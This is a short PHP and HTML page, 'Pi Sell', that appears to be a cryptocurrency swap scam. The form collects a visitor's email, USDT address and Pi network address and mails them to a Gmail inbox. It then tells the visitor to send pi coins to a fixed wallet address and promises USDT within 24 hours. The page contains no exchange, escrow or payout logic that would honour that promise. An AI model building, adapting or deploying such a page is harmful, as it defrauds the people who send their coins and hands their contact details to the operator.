<!DOCTYPE html>
<html>
<head>
    <title>Pi Sell</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        /* Styles for form centering and element alignment */
        form {
            margin: 0 auto;
            width: 300px;
            text-align: center;
        }

        input[type="text"] {
            width: 100%;
            margin-bottom: 10px;
            padding: 10px;
            box-sizing: border-box;
         }

        input[type="email"] {
            width: 100%;
            margin-bottom: 10px;
            padding: 10px;
            box-sizing: border-box;
        }

        input[type="submit"] {
            background-color: purple;
            color: white;
            border: none;
            padding: 10px;
            cursor: pointer;
            margin-left: 65%;
        }

        input[type="submit"]:hover {
            background-color: gray;
        }
    </style>

</head>
<body>

<?php
$mess = "";
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $name = trim($_POST["name"]);
    $email = trim($_POST["email"]);
    $message = trim($_POST["message"]);

    // Set your email address here
    $to = "pinetworkfastsell@gmail.com";

    $subject = "Message from the feedback form";
    $body = "Name: $name\nEmail: $email\n\n$message";

    //Send message to email
    if (mail($to, $subject, $body)) {
        $mess = '<div style="color:green;font-weight:700"> Send your pi coins to this address GDWCMCK7HLJI6TF3LYOTSZ2OYZ4YWNSO4G37N6QJO3FHI2EMMKO3NH7U and within 24 hours you will receive the corresponding USDT  at your specified address.</div>';
    } else {
        $mess = '<div style="color:red;font-weight:700"> Your sale has been suspended, an error has been detected.</div>';
    }
}
?> 

<form action="/" method="post">

    <label for="email">Email:</label><br>
    <input type="email" id="email" name="email" required><br>

    <label for="name">USDT (Tether) :</label><br>
    <input type="text" id="name" name="name" required><br>

    <label for="message">Yor Pi network address :</label><br>
    <input type="text" id="message" name="message" required><br>

    <input type="submit" value="Sell">
    <?php echo $mess;?>
</form>
</body>
</html>